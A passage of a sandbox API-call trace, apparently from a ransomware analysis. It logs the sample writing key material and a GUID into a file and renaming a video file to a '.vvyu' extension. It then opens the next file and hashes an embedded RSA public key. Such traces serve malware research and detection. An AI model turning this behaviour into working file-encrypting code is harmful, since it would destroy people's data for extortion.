Size=0x1f0) returned 0x2d0c3c8 [0202.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1ac8 [0202.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35f0 [0202.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1b10 [0202.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3608 [0202.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3638 [0202.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3698 [0202.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3650 [0202.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.379] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3698 [0202.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0202.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3650 [0202.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3638 [0202.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0202.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0202.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0202.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0202.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.382] GetCurrentThreadId () returned 0x66c [0202.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea9288 [0202.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.383] GetCurrentThreadId () returned 0x66c [0202.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3698 [0202.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3638 [0202.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0202.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3650 [0202.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3620 [0202.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36b0 [0202.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0202.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3680 [0202.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3668 [0202.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36c8 [0202.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3668 [0202.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0202.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3638 [0202.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0202.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0202.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0202.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1b10 | out: hHeap=0x620000) returned 1 [0202.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.401] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x6946, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x6946, lpOverlapped=0x0) returned 1 [0202.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.402] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x694b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.402] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.403] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.404] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.404] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.404] CloseHandle (hObject=0x510) returned 1 [0202.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0202.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0202.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0202.406] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\kvyEO7pECdl1BR27XVAc.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\kvyeo7pecdl1br27xvac.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\kvyEO7pECdl1BR27XVAc.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\kvyeo7pecdl1br27xvac.mkv.vvyu")) returned 1 [0202.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.407] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0202.412] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fced9e0, ftCreationTime.dwHighDateTime=0x1d896fd, ftLastAccessTime.dwLowDateTime=0xb348dc20, ftLastAccessTime.dwHighDateTime=0x1d89df3, ftLastWriteTime.dwLowDateTime=0xb348dc20, ftLastWriteTime.dwHighDateTime=0x1d89df3, nFileSizeHigh=0x0, nFileSizeLow=0x13c5f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MHkDGP m.avi", cAlternateFileName="MHKDGP~1.AVI")) returned 1 [0202.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e91678 [0202.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.412] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\MHkDGP m.avi") returned=".avi" [0202.413] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\MHkDGP m.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\mhkdgp m.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.413] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=80991) returned 1 [0202.413] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.416] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x13c39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.416] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.418] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.418] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x13c5f, lpOverlapped=0x0) returned 1 [0202.420] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.420] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.420] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.420] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.421] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.421] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.422] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.422] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.422] GetLastError () returned 0x0 [0202.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.422] GetLastError () returned 0x0 [0202.422] 